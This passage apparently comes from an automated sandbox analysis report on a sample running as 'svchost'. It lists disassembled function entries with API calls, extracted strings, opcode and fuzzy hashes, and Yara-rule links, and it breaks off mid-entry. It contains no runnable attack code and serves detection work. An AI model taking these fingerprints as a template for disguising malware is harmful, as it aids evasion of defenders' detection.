                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: 4ba8a08589158eccc3b57f3c3040e6f0bf42bfbefdbdbc229c531ca033df2ec7
                                                            • Instruction ID: fe6a1ac0ab090bbe780e6dc223d5ffc4248e3a6a50c00b190f85a2640faba4db
                                                            • Opcode Fuzzy Hash: 4ba8a08589158eccc3b57f3c3040e6f0bf42bfbefdbdbc229c531ca033df2ec7
                                                            • Instruction Fuzzy Hash: E41178322447187BE6207BB4AC8AFAF765CFF14711F058122FA01E60E1DB64CF0542B6
                                                            Function 008596F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00859705
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 00859711
                                                            • _free.LIBCMT ref: 0085971C
                                                            • _free.LIBCMT ref: 00859727
                                                            • _free.LIBCMT ref: 00859732
                                                            • _free.LIBCMT ref: 0085973D
                                                            • _free.LIBCMT ref: 00859748
                                                            • _free.LIBCMT ref: 00859753
                                                            • _free.LIBCMT ref: 0085975E
                                                            • _free.LIBCMT ref: 0085976C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 5da0d798d5e4b927ae01d22daca421d90e5f2d5d33883888cd532dc020d8519c
                                                            • Instruction ID: 9235e607c78137536858b0bf74964531a9b61f3c94e19cf200f2072f2576bad1
                                                            • Opcode Fuzzy Hash: 5da0d798d5e4b927ae01d22daca421d90e5f2d5d33883888cd532dc020d8519c
                                                            • Instruction Fuzzy Hash: 4C119276110109EFCB01EF98C842CD93FB5FF14391B5155A2FA089B262DE32DA589B85
                                                            Function 00852E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: c8e01dfe44aaebb013a1829770c5bac70331ea1c9772abec7efd1693aa2f1be4
                                                            • Instruction ID: b0fc29813ffb71dc2a022b4a7e45f1f1b843157c6bdb3d0c9d38c1e1f98fb4a0
                                                            • Opcode Fuzzy Hash: c8e01dfe44aaebb013a1829770c5bac70331ea1c9772abec7efd1693aa2f1be4
                                                            • Instruction Fuzzy Hash: 47B17931800619EFCF25DFA8D8819AEB7B5FF05352B144559FC01AB212DB31DA59CF92
                                                            Function 00836FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00836FAA
                                                            • _wcslen.LIBCMT ref: 00837013
                                                            • _wcslen.LIBCMT ref: 00837084
                                                              • Part of subcall function 00837A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00837AAB
                                                              • Part of subcall function 00837A9C: GetLastError.KERNEL32 ref: 00837AF1
                                                              • Part of subcall function 00837A9C: CloseHandle.KERNEL32(?), ref: 00837B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: 16646dc7baad6c292bfa0fa0755c8aa6ae3a855ea34b0ad1bbb2ad9f8418c658
                                                            • Instruction ID: d0d3749cc94b31c9d01e601bd966fb970e8f1ce4acb8096e1a7faf56f4a43fe9
                                                            • Opcode Fuzzy Hash: 16646dc7baad6c292bfa0fa0755c8aa6ae3a855ea34b0ad1bbb2ad9f8418c658
                                                            • Instruction Fuzzy Hash: 1841E7F1D0474869EB30A7789C46FEE776CFF84304F004455FA55E2182D674DA8887A2
                                                            Function 0084B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00831316: GetDlgItem.USER32(00000000,00003021), ref: 0083135A
                                                              • Part of subcall function 00831316: SetWindowTextW.USER32(00000000,008635F4), ref: 00831370
                                                            • EndDialog.USER32(?,00000001), ref: 0084B610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0084B637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0084B650
                                                            • SetWindowTextW.USER32(?,?), ref: 0084B661
                                                            • GetDlgItem.USER32(?,00000065), ref: 0084B66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0084B67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0084B694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: f3a2206e5feda9ac0bf4c67fa3031a86201d716e99b6ee8b9b02c4dff69c74ab
                                                            • Instruction ID: 73fd2e5e18ebc010e8899ee06bba537ab4a615cbda6f90a78886bd9e18ea7bae
                                                            • Opcode Fuzzy Hash: f3a2206e5feda9ac0bf4c67fa3031a86201d716e99b6ee8b9b02c4dff69c74ab
                                                            • Instruction Fuzzy Hash: 1E21E232204219BBD611AF6AEC4EF3B3B6DFB56B85F060015F604E21A0DB52DE019732
                                                            Function 0084FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,7EEF2A03,00000001,00000000,00000000,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 0084FE1F
                                                            • _com_issue_error.COMSUPP ref: 0084FE48
                                                            • _com_issue_error.COMSUPP ref: 0084FE52
                                                            • GetLastError.KERNEL32(80070057,7EEF2A03,00000001,00000000,00000000,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FE57
                                                            • _com_issue_error.COMSUPP ref: 0084FE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,0083AF6C,ROOT\CIMV2), ref: 0084FE80
                                                            • _com_issue_error.COMSUPP ref: 0084FE93
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: 4ec5bf7b5755dc159a5c878dbebdb6b4816db73631605d86d720491a21f024a9
                                                            • Instruction ID: 063a0eeb7ce11900d15aafdc2cecceba455afad4231e4dc6aa9509a4d5fd3dff
                                                            • Opcode Fuzzy Hash: 4ec5bf7b5755dc159a5c878dbebdb6b4816db73631605d86d720491a21f024a9
                                                            • Instruction Fuzzy Hash: 6241D871A0021DAFDB109FA8CC45BAEBBA8FF44711F10423EFA15EB292D7749900C7A5
                                                            Function 0083AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: b9e37937acd73296dcfd19371cb8233b58b2218962903868981fc126518ebd00
                                                            • Instruction ID: d0e8a1b21d27c7278eda2db70932a2ab99a8161d013230a72c01cf35bba31911
                                                            • Opcode Fuzzy Hash: b9e37937acd73296dcfd19371cb8233b58b2218962903868981fc126518ebd00
                                                            • Instruction Fuzzy Hash: FA715D71A00619AFDB18DFA4CCA59AFB7B9FF88711F150159E516E73A0CB70AD01CB90
                                                            Function 00839382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00839387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008393AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008393C9
                                                              • Part of subcall function 0083C29A: _wcslen.LIBCMT ref: 0083C2A2
                                                              • Part of subcall function 00841FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0083C116,00000000,.exe,?,?,00000800,?,?,?,00848E3C), ref: 00841FD1
                                                            • _swprintf.LIBCMT ref: 00839465
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 008394D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 00839514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 13911588ee77b0bcc5dd41377e528341c2a4e7f92dadf5880664456f8923bbb5
                                                            • Instruction ID: 6f24576a04405dc09e9c59a198b106a0e861ee91a486f84e70c402294c78fc56
                                                            • Opcode Fuzzy Hash: 13911588ee77b0bcc5dd41377e528341c2a4e7f92dadf5880664456f8923bbb5
                                                            • Instruction Fuzzy Hash: 37416271900259A6DF21EBA4CC45EDE737CFF95340F4048A5F689E3051EBB88BC98BA1
                                                            Function 00841218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 0084122E
                                                              • Part of subcall function 0083B146: GetVersionExW.KERNEL32(?), ref: 0083B16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00841251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00841263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00841274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00841294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008412CF
                                                            • __aullrem.LIBCMT ref: 00841379
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                            • String ID:
                                                            • API String ID: 1247370737-0
                                                            • Opcode ID: 7ca851203def793cac9627acd6c5c88519b06e9a007b602502f848a564dee583
                                                            • Instruction ID: c7abfdb46335d8351be97693dc759458d8e7f92b6d12519d0982ad1c2ac32da0
                                                            • Opcode Fuzzy Hash: 7ca851203def793cac9627acd6c5c88519b06e9a007b602502f848a564dee583
                                                            • Instruction Fuzzy Hash: C441E5B1508349AFC710DF65C88496BFBF9FB88714F00892EF596C2610E778E649CB62
                                                            Function 00832210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00832536
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf_wcslen
                                                            • String ID: ;%u$x%u$xc%u
                                                            • API String ID: 3053425827-2277559157
                                                            • Opcode ID: cf859f7902dd131a57e82e4a9e2acb1838bd500926145e3756ee7090baf3521a
                                                            • Instruction ID: 243b6b214722bd0db875bb03ec246335e64f1836bae7cadd75f23797e0336c6f
                                                            • Opcode Fuzzy Hash: cf859f7902dd131a57e82e4a9e2acb1838bd500926145e3756ee7090baf3521a
                                                            • Instruction Fuzzy Hash: E0F1E5706083449BDB15EB288495BFA7799FFD4300F08057DED86EB283DB64994687E3
                                                            Function 00849CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: </p>$</style>$<br>$<style>$>
                                                            • API String ID: 176396367-3568243669
                                                            • Opcode ID: fc5130aa7158c27a2e3b922ca0bd89b804b901be57e90fd19ae1ad4a0eb90c08
                                                            • Instruction ID: ff84e5712c9fbb8f1a2da3a19e3c1e84e1c817bc16b2345a9bf1d290e0f466a4
                                                            • Opcode Fuzzy Hash: fc5130aa7158c27a2e3b922ca0bd89b804b901be57e90fd19ae1ad4a0eb90c08
                                                            • Instruction Fuzzy Hash: DE51FA66B4132F95DB309A699C11B7773E4FFA17A0F69041AFDC1CB2C0FBA58D818261
                                                            Function 0085F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0085FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0085F6CF
                                                            • __fassign.LIBCMT ref: 0085F74A
                                                            • __fassign.LIBCMT ref: 0085F765
                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0085F78B
                                                            • WriteFile.KERNEL32(?,00000000,00000000,0085FE02,00000000,?,?,?,?,?,?,?,?,?,0085FE02,00000000), ref: 0085F7AA
                                                            • WriteFile.KERNEL32(?,00000000,00000001,0085FE02,00000000,?,?,?,?,?,?,?,?,?,0085FE02,00000000), ref: 0085F7E3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                            • String ID:
                                                            • API String ID: 1324828854-0
                                                            • Opcode ID: dfbb77e406beeff5489801382a242c9c4059a300f1daaadd1cf1593919a1f83b
                                                            • Instruction ID: d14171f26b35c1380c101c3c8adc9b826e14cf2dd0cea8a2766d122a223d8f3d
                                                            • Opcode Fuzzy Hash: dfbb77e406beeff5489801382a242c9c4059a300f1daaadd1cf1593919a1f83b
                                                            • Instruction Fuzzy Hash: CD5193B5900249AFCB10CFA8D845AEEBBF4FF09301F14416AEA55E7252D670A944CBA1
                                                            Function 00852900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 00852937
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0085293F
                                                            • _ValidateLocalCookies.LIBCMT ref: 008529C8
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 008529F3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00852A48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: feff6d05d7368de195941848554a40e6df9209565ae8722e54534f75dfd5ee78
                                                            • Instruction ID: 07fb17385d741d0d102740ed580f535a33309a79e125b981c33a554efabca71a
                                                            • Opcode Fuzzy Hash: feff6d05d7368de195941848554a40e6df9209565ae8722e54534f75dfd5ee78
                                                            • Instruction Fuzzy Hash: 2C418234A00618AFCF10DF68C885A9E7FB5FF46325F1481A5EC15EB392DB719A09CB91
                                                            Function 00849ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(?,00000000), ref: 00849EEE
                                                            • GetWindowRect.USER32(?,00000000), ref: 00849F44
                                                            • ShowWindow.USER32(?,00000005,00000000), ref: 00849FDB
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00849FE3
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00849FF9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$RectText
                                                            • String ID: RarHtmlClassName
                                                            • API String ID: 3937224194-1658105358
                                                            • Opcode ID: ac543cd67131bd9abf0b8aced5f37f39baa293e60616c29b3aaf84d707dd403d
                                                            • Instruction ID: 56e4baaa1004bfeb002f9873d4394c0565c939a2f48a6687806e91d899522903
                                                            • Opcode Fuzzy Hash: ac543cd67131bd9abf0b8aced5f37f39baa293e60616c29b3aaf84d707dd403d
